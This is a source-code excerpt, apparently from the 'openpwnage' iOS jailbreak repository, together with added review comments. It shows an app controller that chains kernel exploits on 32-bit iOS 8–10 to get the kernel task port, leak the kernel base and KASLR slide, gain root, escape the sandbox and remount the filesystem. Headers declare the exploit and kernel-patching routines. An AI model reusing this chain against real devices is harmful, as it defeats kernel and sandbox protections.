[NSArray arrayWithObjects:@"iPad2,1",@"iPad2,2",@"iPad2,3",@"iPad2,4",@"iPad2,5",@"iPad2,6",@"iPad2,7",@"iPad3,1",@"iPad3,2",@"iPad3,3",@"iPad3,4",@"iPad3,5",@"iPad3,6",@"iPhone4,1",@"iPhone5,1",@"iPhone5,2",@"iPhone5,3",@"iPhone5,4",@"iPod5,1", nil]; 163 | //supports all 32bit devices on 9.0-9.3.6 (the kinfo leak works on 8.0-8.4.1 but the mach_ports_register() bug (CVE-2016-4669) doesn't), aka iPad 2, iPad Mini 1, iPad 3, iPad 4, iPhone 4S, iPhone 5, iPhone 5C, iPod Touch 5 164 | if([supportedDevices containsObject:[NSString stringWithCString:systemInfo.machine encoding:NSUTF8StringEncoding]]){ 165 | NSString *kver = [NSString stringWithCString:newkernv encoding:NSUTF8StringEncoding]; 166 | NSArray *supportedKernVers = [NSArray arrayWithObjects:@"3789.70.16~4",@"3248.61.1~1",@"3248.60.9~1",@"3248.60.8~1",@"3248.60.4~1",@"3248.60.3~3",@"3248.50.21~4",@"3248.50.20~1",@"3248.50.18~1",@"3248.41.4~2",@"3248.41.4~3",@"3248.41.3~1",@"3248.40.173.0.1~1",@"3248.40.166.0.1~1",@"3248.40.155.1.1~3",@"3248.31.3~2",@"3248.21.2~1",@"3248.21.1~2",@"3248.20.39~8",@"3248.20.33.0.1~7",@"3248.10.42~4",@"3248.10.41~1",@"3248.10.38~3",@"3248.10.27~1",@"3248.1.3~1",@"3248.1.2~3",@"3247.1.88.1.1~1",@"3247.1.56~1",@"3247.1.36.0.1~9",@"3247.1.6.1.1~2",@"3216.0.0.1.15~2",@"2784.40.6~1",@"2784.30.7~3",@"2784.30.7~1", nil]; 167 | if (!([supportedKernVers containsObject:kver])) { 168 | [self openpwnageConsoleLog:@"[*]your device is supported by openpwnage, but your iOS version is not\n"]; 169 | [self openpwnageConsoleLog:@"[*]openpwnage supports 32bit 8.4b4-10.3.4 only at the moment\n"]; 170 | _jbButton.hidden = 1; 171 | consoleView.backgroundColor = UIColorFromRGB(0xF9c9c9); 172 | } else { 173 | _notSupportedLabel.hidden = 1; 174 | if ([@"3789.70.16~4" isEqualToString:kver]) { 175 | olog("openpwnage support on 10.3.3b6/10.3.3 is not complete\n"); 176 | } 177 | if ([[NSArray arrayWithObjects:@"2784.40.6~1",@"2784.30.7~3",@"2784.20.34~2",@"2784.30.7~1",@"2784.30.5~7",nil] containsObject:kver]) 
{
178 | //olog("openpwnage support on 8.X is not complete\n");
179 | }
180 | }
181 | } else {
182 | [self openpwnageConsoleLog:@"[*]your device is not supported by openpwnage\n"];
183 | _jbButton.hidden = 1;
184 | consoleView.backgroundColor = UIColorFromRGB(0xF9c9c9);
185 | }
186 | }
// Swaps the button to its "jailbreaking" artwork, disables it, and schedules
// -openpwnage on the main queue.
187 | - (IBAction)jailbreakButtonPressed:(id)sender {
// style: the same image is assigned for four states; a loop over the states (or a
// single setImage:forState:UIControlStateNormal, which UIButton falls back to for
// states without their own image) would be shorter.
188 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateNormal];
189 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateHighlighted];
190 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateSelected];
191 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateDisabled];
192 | _jbButton.enabled = NO;
193 | /*CGRect frame = _jbButton.frame;
194 | frame.size.height += 1;
195 | _jbButton.frame = frame;*/
196 | [_jbButton setNeedsDisplay];
197 | NSLog(@"button pressed");
// NOTE(review): dispatching to the main queue still runs -openpwnage on the UI
// thread, so presumably the console text appended during the run is not drawn until
// it returns — confirm. -openpwnage takes no argument, so withObject:self is ignored.
198 | dispatch_async(dispatch_get_main_queue(), ^{
199 | [self performSelector:@selector(openpwnage) withObject:self];
200 | });
201 | }
202 | 
203 | -(void)openpwnage {
204 | size_t size;
205 | sysctlbyname("kern.version", NULL, &size, NULL, 0);
206 | char *kernelVersion = malloc(size);
207 | sysctlbyname("kern.version", kernelVersion, &size, NULL, 0);
208 | olog("%s\n",kernelVersion);
209 | 
// NOTE(review): this kern.version parsing duplicates the block in -viewDidLoad and
// has the same holes: size - 44 wraps to a huge size_t when the string is shorter
// than 44 bytes, strchr() may return NULL (making indexofsemi garbage), and the
// backward scan for '-' has no lower bound. Neither buffer is freed in the visible
// part of this method. Factoring it into one helper that validates each step would
// fix both call sites.
210 | char *newkernv = malloc(size - 44);
211 | char *semicolon = strchr(kernelVersion, '~');
212 | int indexofsemi = (int)(semicolon - kernelVersion);
213 | int indexofrootxnu = indexofsemi;
214 | while (kernelVersion[indexofrootxnu - 1] != '-') {
215 | indexofrootxnu -= 1;
216 | }
217 | memcpy(newkernv, &kernelVersion[indexofrootxnu], indexofsemi - indexofrootxnu + 2);
218 | newkernv[indexofsemi - indexofrootxnu + 2] = '\0';
219 | 
220 | olog("Kernel Version: 
%s\n",newkernv); 221 | NSString *kver = [NSString stringWithCString:newkernv encoding:NSUTF8StringEncoding]; 222 | if ([@"3789.70.16~4" isEqualToString:kver]) { //iOS 10 223 | [self openpwnageConsoleLog:@"[*]starting jailbreak...\n"]; 224 | task_t tfp0 = sock_port_tfp0(); 225 | if (tfp0 == 0) { 226 | olog("failed to get tfp0 :(\n"); 227 | exit(42); 228 | } 229 | [self openpwnageConsoleLog:@"[*]we tried getting tfp0, and holy shit it actually worked\n"]; 230 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]tfp0=0x%x\n", tfp0]]; 231 | [self openpwnageConsoleLog:@"[*]we should try getting kbase now, hold on...\n"]; 232 | uintptr_t kernel_base = get_kernel_base(tfp0); 233 | [self openpwnageConsoleLog:@"[*]ayo, yet another success!\n"]; 234 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]huzzah, kbase=0x%08lx\n", kernel_base]]; 235 | [self openpwnageConsoleLog:@"[*]one more thing we need to get before patching: kaslr slide.\n"]; 236 | uintptr_t kaslr_slide = kernel_base - UNSLID_BASE; 237 | [self openpwnageConsoleLog:@"[*]WOOO! 
Now we talkin'!\n"]; 238 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08lx\n", kaslr_slide]]; 239 | [self openpwnageConsoleLog:@"[*]obtaining root...\n"]; 240 | 241 | if (rootify(tfp0, kernel_base, kaslr_slide)) { 242 | [self openpwnageConsoleLog:@"[*]we root baby\n"]; 243 | } 244 | if (is_pmap_patch_success(tfp0, kernel_base, kaslr_slide)) { 245 | olog("pmap patch success!\n"); 246 | } else { 247 | olog("pmap patch no success :(\n"); 248 | } 249 | } else if ([[NSArray arrayWithObjects:@"2784.40.6~1",@"2784.30.7~3",@"2784.30.7~1",@"2784.30.5~7",@"2784.20.34~2",nil] containsObject:kver]) { //iOS 8.3-8.4.1 250 | olog("starting jb\n"); 251 | //[self openpwnageConsoleLog:@"[*]aw yeah da hot sauce\n"]; 252 | //consoleView.text = [[NSString alloc]initWithString:[consoleView.text stringByAppendingString:@"fill me with cum already\n"]]; 253 | mach_port_t tfp0 = dajb(); 254 | if (tfp0 == 0) { 255 | olog("failed to get tfp0 :(\n"); 256 | exit(42); 257 | } 258 | //task_t tfp0 = get_kernel_task(); 259 | olog("getting kbase again rather than using our existing one because idfk...\n"); 260 | uint32_t kernel_base = leak_kernel_base(); 261 | //uintptr_t kernel_base = kbase(); 262 | olog("[*]woo kbase got... 
again\n"); 263 | olog("[*]kbase=0x%08lx\n", kernel_base); //this works 264 | CGRect frame = consoleView.frame; 265 | frame.size.height -= 1; 266 | consoleView.frame = frame; 267 | [consoleView setNeedsDisplay]; 268 | //sleep(10); 269 | olog("[*]calculating kaslr slide...\n"); 270 | uint32_t kaslr_slide = kernel_base - UNSLID_BASE; 271 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08x\n", kaslr_slide]]; 272 | [self openpwnageConsoleLog:@"[*]obtaining root...\n"]; 273 | if (rootify(tfp0, kernel_base, kaslr_slide)) { 274 | [self openpwnageConsoleLog:@"[*]we root baby\n"]; 275 | if (is_pmap_patch_success(tfp0, kernel_base, kaslr_slide)) { 276 | olog("pmap patch success!\n"); 277 | } else { 278 | olog("pmap patch no success :(\n"); 279 | } 280 | olog("time for unsandbox...\n"); 281 | unsandbox8(tfp0,kernel_base,kaslr_slide); 282 | } else { 283 | [self openpwnageConsoleLog:@"[*]root failed :(\n"]; 284 | } 285 | } else { //iOS 9 286 | [self openpwnageConsoleLog:@"[*]starting jailbreak...\n"]; 287 | task_t tfp0 = get_kernel_task(); 288 | [self openpwnageConsoleLog:@"[*]we tried getting tfp0, and holy shit it actually worked\n"]; 289 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]tfp0=0x%x\n", tfp0]]; 290 | [self openpwnageConsoleLog:@"[*]we should try getting kbase now, hold on...\n"]; 291 | uintptr_t kernel_base = kbase(); 292 | [self openpwnageConsoleLog:@"[*]ayo, yet another success!\n"]; 293 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]huzzah, kbase=0x%08lx\n", kernel_base]]; 294 | [self openpwnageConsoleLog:@"[*]one more thing we need to get before patching: kaslr slide.\n"]; 295 | uintptr_t kaslr_slide = kernel_base - UNSLID_BASE; 296 | [self openpwnageConsoleLog:@"[*]WOOO! 
Now we talkin'!\n"]; 297 | [self openpwnageConsoleLog:[NSString stringWithFormat: @"[*]slide=0x%08lx\n", kaslr_slide]]; 298 | [self openpwnageConsoleLog:@"[*]cleaning up exploit...\n"]; 299 | exploit_cleanup(tfp0); 300 | [self openpwnageConsoleLog:@"[*]nice and tidy\n"]; 301 | [self openpwnageConsoleLog:@"[*]this is great and all, but now time for actual shit\n"]; 302 | //patch kernel pmap 303 | [self openpwnageConsoleLog:@"[*]obtaining root...\n"]; 304 | if (rootify(tfp0, kernel_base, kaslr_slide)) { 305 | [self openpwnageConsoleLog:@"[*]we root baby\n"]; 306 | [self openpwnageConsoleLog:@"[*]now, time to nuke sandbox\n"]; 307 | if (unsandbox(tfp0, kernel_base, kaslr_slide)) { 308 | [self openpwnageConsoleLog:@"[*]no need to worry about sandbox anymore\n"]; 309 | [self openpwnageConsoleLog:@"[*]attempting remounting...\n"]; 310 | if (remount()) { 311 | olog("remount success!"); 312 | } 313 | } else { 314 | [self openpwnageConsoleLog:@"[*]failed to nuke sandbox\n"]; 315 | } 316 | } else { 317 | [self openpwnageConsoleLog:@"[*]failed to get root :(\n"]; 318 | } 319 | //unpatch pmap 320 | [self openpwnageConsoleLog:@"[*]that's all for know. 
more soon (hopefully)\n"]; 321 | //go(); 322 | } 323 | } 324 | 325 | -(void)openpwnageConsoleLog: (NSString*)textToLog { 326 | NSLog(@"%@", [[NSString alloc]initWithString:textToLog]); 327 | NSMutableString *mutableLog = [consoleView.text mutableCopy]; 328 | 329 | consoleView.text = [[NSString alloc]initWithString:[mutableLog stringByAppendingString:textToLog]]; 330 | /*dispatch_async(dispatch_get_main_queue(), ^{ 331 | [consoleView setNeedsDisplay]; 332 | }); 333 | CGRect frame = consoleView.frame; 334 | frame.size.height += 1; 335 | consoleView.frame = frame; 336 | frame.size.height -= 1; 337 | consoleView.frame = frame; 338 | //[consoleView scrollRangeToVisible:NSMakeRange(consoleView.text.length, 0)]; 339 | [consoleView setNeedsDisplay]; 340 | //CGRect frame = consoleView.frame; 341 | frame.size.height += 1; 342 | consoleView.frame = frame; 343 | frame.size.height -= 1; 344 | consoleView.frame = frame;*/ 345 | //return; 346 | return; 347 | } 348 | 349 | void openpwnageCLog(NSString* textToLog) { 350 | //NSLog(@"openpwnageCLog\n");a 351 | //NSLog(@"%@", [[NSString alloc]initWithString:textToLog]); 352 | /*dispatch_sync(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_BACKGROUND, 0), ^{ 353 | [param_ openpwnageConsoleLog:textToLog]; 354 | });*/ 355 | [param_ openpwnageConsoleLog:textToLog]; 356 | /*[UIView performWithoutAnimation:^{ \ 357 | [param_ openpwnageConsoleLog:textToLog]; 358 | }]; \*/ 359 | /*dispatch_async(dispatch_get_main_queue(), ^{ 360 | [param_ openpwnageConsoleLog:textToLog]; 361 | });*/ 362 | } 363 | 364 | @end 365 | -------------------------------------------------------------------------------- /openpwnage/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/bootstrap.tar -------------------------------------------------------------------------------- /openpwnage/jailbreak.h: 
-------------------------------------------------------------------------------- 1 | // 2 | // jailbreak.h 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 4/24/22. 6 | // 7 | 8 | #ifndef jailbreak_h 9 | #define jailbreak_h 10 | /* Post-exploitation kernel-patching primitives used by ViewController once the exploit yields tfp0 (the kernel task port). Each bool-returning routine reports false on failure and callers are expected to branch on it (ViewController does). NOTE(review): this header names task_t, mach_port_t, uintptr_t, uint32_t, uint64_t and bool but includes nothing, so it compiles only after the includer has pulled in <mach/mach.h>, <stdint.h> and <stdbool.h>; it also mixes 64-bit (uintptr_t/uint64_t), 32-bit (uint32_t) and task_t-vs-mach_port_t conventions across the declarations. */ 11 | /* Patch kernel memory via tfp0 so the calling process gains root (per ViewController's log strings). kernel_base and kaslr_slide are passed straight through from the exploit stage; whether kernel_base is already slid is not visible here — confirm against the implementation. */ bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide); 12 | /* Disable the sandbox for the calling process through the same kernel-patch path (per ViewController's log strings); same parameter contract as rootify. */ bool unsandbox(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide); 13 | /* 32-bit variant (the 8 suffix parallels patchfinder8.h, whose finders also take uint32_t addresses); note it takes a raw mach_port_t rather than task_t. */ bool unsandbox8(mach_port_t tfp0, uint32_t kernel_base, uint32_t kaslr_slide); 14 | //void patch_kernel_pmap(void); 15 | /* Reports whether the kernel pmap patch took effect. patch_kernel_pmap itself is only a commented-out declaration above, and ViewController carries only "//patch kernel pmap" / "//unpatch pmap" placeholder comments, so confirm this path is still live before relying on it. */ bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide); 16 | /* printf-style logger (ViewController calls it with a string literal). Security: the format argument must always be a compile-time literal — never route device-, user- or kernel-derived text through it as the format, or this becomes a classic format-string bug. TODO(review): declare it __attribute__((format(printf, 1, 2))) so the compiler checks call sites, and take const char * since literals are what is passed. */ void olog(char *format, ...); 17 | /* Revert the pmap patch. ViewController has a "//unpatch pmap" comment where the call would go, but no invocation is visible in the excerpt. */ void pmap_unpatch(task_t tfp0); 18 | /* Remount (presumably the root filesystem read-write; the implementation is not visible here). Called by ViewController after unsandbox succeeds; a true result is logged via olog. */ bool remount(void); 19 | /* Locate the allproc list starting from ourproc (presumably the caller's proc struct address) by reading kernel memory through tfp0. Uses 64-bit integers, unlike the uintptr_t/uint32_t conventions above. */ uint64_t find_da_allproc(uint64_t ourproc, mach_port_t tfp0); 20 | #endif /* jailbreak_h */ 21 | -------------------------------------------------------------------------------- /openpwnage/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/launchctl -------------------------------------------------------------------------------- /openpwnage/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 4/20/22. 6 | // 7 | 8 | #import 9 | #import "AppDelegate.h" 10 | /* Stock Xcode template entry point: resolves the AppDelegate class name inside an autorelease pool and hands control to UIApplicationMain. No application logic lives here. */ 11 | int main(int argc, char * argv[]) { 12 | NSString * appDelegateClassName; 13 | @autoreleasepool { 14 | // Setup code that might create autoreleased objects goes here. 
15 | appDelegateClassName = NSStringFromClass([AppDelegate class]); 16 | } 17 | return UIApplicationMain(argc, argv, nil, appDelegateClassName); 18 | } 19 | -------------------------------------------------------------------------------- /openpwnage/openpwnage/patchfinder8.h: -------------------------------------------------------------------------------- 1 | #ifndef patchfinder8_h 2 | #define patchfinder8_h 3 | 4 | #include 5 | #include 6 | /* 32-bit pattern finders (the 8 suffix suggests an iOS 8-era kernel target). Each presumably scans kdata, a ksize-byte in-memory copy of the kernel image, and returns the located address expressed relative to region (the address the copy corresponds to); what they return when the pattern is absent is not visible here, so callers must confirm the "not found" value in patchfinder8.c before patching at the result. NOTE(review): the two #include targets were lost in this rendering; they need to supply uint32_t, uint8_t and size_t (<stdint.h>, <stddef.h>). */ 7 | uint32_t find_mount8(uint32_t region, uint8_t* kdata, size_t ksize); 8 | uint32_t find_cs_enforcement_disable_amfi8(uint32_t region, uint8_t* kdata, size_t ksize); 9 | uint32_t find_sandbox_call_i_can_has_debugger8(uint32_t region, uint8_t* kdata, size_t ksize); 10 | uint32_t find_vn_getpath8(uint32_t region, uint8_t* kdata, size_t ksize); 11 | uint32_t find_memcmp8(uint32_t region, uint8_t* kdata, size_t ksize); 12 | uint32_t find_sb_patch8(uint32_t region, uint8_t* kdata, size_t ksize); 13 | uint32_t find_p_bootargs8(uint32_t region, uint8_t* kdata, size_t ksize); 14 | #endif /* patchfinder8_h */ 15 | -------------------------------------------------------------------------------- /openpwnage/openpwnage/trident.h: -------------------------------------------------------------------------------- 1 | // 2 | // trident.h 3 | // openpwnage 4 | // 5 | // Created by Zachary Keffaber on 8/2/22. 
6 | // 7 | 8 | #ifndef trident_h 9 | #define trident_h 10 | /* Exploit entry points (the file name suggests the Trident chain; the uint32_t base implies a 32-bit kernel). dajb() presumably returns the kernel task port (tfp0) that jailbreak.h's routines consume, and leak_kernel_base() the slid kernel base; neither failure value is visible here — confirm (MACH_PORT_NULL / 0?) and check it before passing results on. Header includes nothing, so mach_port_t and uint32_t must already be in scope at the include site. */ mach_port_t dajb(void); 11 | uint32_t leak_kernel_base(void); 12 | #endif /* trident_h */ 13 | -------------------------------------------------------------------------------- /openpwnage/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/openpwnage/tar -------------------------------------------------------------------------------- /releases/openpwnage-build9-fix.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xilis/openpwnage/8cda845c796d78dc9bbd3b07c728b51927204b60/releases/openpwnage-build9-fix.ipa --------------------------------------------------------------------------------